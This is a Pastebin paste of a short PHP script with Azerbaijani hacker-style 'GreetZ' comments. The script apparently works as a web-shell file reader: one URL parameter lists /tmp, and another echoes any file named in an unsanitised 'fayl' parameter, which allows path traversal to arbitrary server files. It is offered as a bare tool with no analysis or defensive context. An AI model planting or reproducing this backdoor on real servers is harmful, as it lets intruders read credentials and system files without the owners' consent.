Guest User

Untitled

a guest
Jun 25th, 2018
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. <?php
  2. $page=$_GET['page'];
  3. if($page=="oxu")
  4. {
  5. $deyisen=scandir('/tmp');
  6. $say=count($deyisen);
  7. for($i=0; $i<$say; $i++)
  8. {
  9. echo $deyisen[$i].'</br>';
  10. }
  11. }
  12. elseif($page=="cek")
  13. {
  14. $get=$_GET['fayl'];
  15. echo readfile('/tmp/'.$get.'').'</br>';
  16. }
  17. else
  18. {
  19. echo 'Alinmadi';
  20. }
  21. //GreetZ Javid Qahramanov
  22. //Respect To My BroS 4zst0rm
  23. //efir vasitesi ile stepede atesli salam :D
  24.  
  25. ?>
Add Comment
Please, Sign In to add comment